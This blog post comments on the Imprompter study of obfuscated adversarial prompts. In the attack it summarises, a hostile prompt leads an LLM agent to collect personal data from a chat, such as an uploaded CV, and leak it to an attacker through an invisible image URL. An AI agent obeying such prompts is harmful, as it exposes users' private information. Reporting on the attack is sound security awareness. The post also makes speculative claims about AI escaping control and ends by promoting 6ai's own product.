top of page

The” Impossible Language” Trickery

LLMs – No guardrails and Nefarious Methods 





Perry C. Douglas

October 17, 2024


I wrote an article a few weeks back titled “Reasoning and the Impossible Language - The Fragility of Large Language Models.” The article was about what former MIT Scientist and public intellectual Noam Chomsky called LLMs: the “Impossible Language,” which is only understandable and applicable to the machine's language itself. Using ChatGPT as an example, Chomsky explained why Generative AI/LLM systems are generally deficient because they don’t know the real world. The “impossible language” violates all the rules of linguistics and more, but those same violations, he says, are the only way it (ChatGPT) can perform.

 

Chomsky points out that the impossible machine language becomes dangerous as it creates its own rules and methods—only it can understand it. Where decisions come from and how they’re generated and formed are critical to how they’re translated into words and, subsequently, how they are interpreted and acted upon. 


The danger comes when LLMs develop and operate on their own! A separate impossible language develops, putting more control in the hands of the machine, which Chomsky says creates grave safety concerns.

 

These concerns are brought to light in a new research study Imprompter: Tricking LLM Agents into Improper Tool Use https://imprompter.ai/?utm_source=substack&utm_medium=email




@Wired


The authors report a “…shift in the security foundations of agent-based systems and surface a new class of automatically computed obfuscated adversarial prompt attacks that violate the confidentiality and integrity of user resources connected to an LLM agent.” For example, LLMs are increasingly becoming agents that can carry out tasks on behalf of humans, such as booking flights or being connected to an external database to provide specific answers. 


“Our current hypothesis is that the LLMs learn hidden relationships between tokens from text, and these relationships go beyond natural language.” “It is almost as if there is a different language that the model understands.” 


So yes, the machine seems on its way to creating its own impossible language, functions to gather personal information and formatting it to create commands...making its own decisions. In the attacker example given, “The LLM visits this URL to try and retrieve the image and leaks the personal information to the attacker. The LLM responds in the chat with a 1x1 transparent pixel that can’t be seen by the users.”


Therefore, people can be engineered and suckered into believing whatever unintelligible prompt is put in front of them and not questioning it. The example of “the CV” is given, where “researchers point to numerous websites that provide people with prompts they can use. They tested the attack by uploading a CV to conversations with chatbots, and it was able to return the personal information contained within the file…an "information exfiltration attack.”


People are unwittingly giving consent to share personal information and how it is going to be used; they don’t know what’s going on, and they are tricked into sharing their info.

 

Various examples, demos and textual adversarial prompts are presented in the research paper, showing a nearly 80% success rate in an end-to-end evaluation.


"ChatGPT, the world’s most used chatbot, governed by training data that nobody knows about, obeying an algorithm that is only hinted at, glorified by the media, and yet with ethical guardrails that only sorta kinda work and that are driven more by text similarity than any true moral calculus.” 


There is no government regulation governing this; LLMS are serving “propaganda, troll farms, and rings of fake websites that degrade trust across the internet.”

As the impossible language grows, the greater the probability that AI gets away from us, increasingly dangerous and uncontrollable, iniquitous and atrocious. Becoming the arbiters of our lives.

 

The more we use LLMs, the more holes we keep finding, LLMs are like Swiss Cheese, says Computer Scientist Gary Marcus, and that causes "huge problems," he says. This one happens to be on the security front with our personal information being extracted, who knows where it ends up, and the potential risks it presents to users. It’s always what we don’t know that can harm us most.

 

Large Language Models are over-hyped, particularly by media who pretend to know what they are talking about. The idea that you can just build larger and larger language models and it will provide all the answers is a display of wilful ignorance or hubris, lacking an understanding of how intelligence and problem-solving authentically work in the real world.

 

Focus and strategy have always been the optimal approaches to problem-solving. Therefore, 6ai Technologies focuses on building Focused Language Model -Templates (FLM-T) to solve the very specific problem the user engages in. Unlike LLMs, FLM-Ts do not seek to be larger and larger naively and simplistically; science fiction and being a jack of all trades but a master of none. 


6ai believes smaller and more focused is better and without the aggravations and dangers of LLM hallucination and security risks, just to name a couple of problems. Strategically focused problem-solving has consistently been proven in the real world, so why would we change that fundamental approach? 


0 comments

Recent Posts

See All

Comments


bottom of page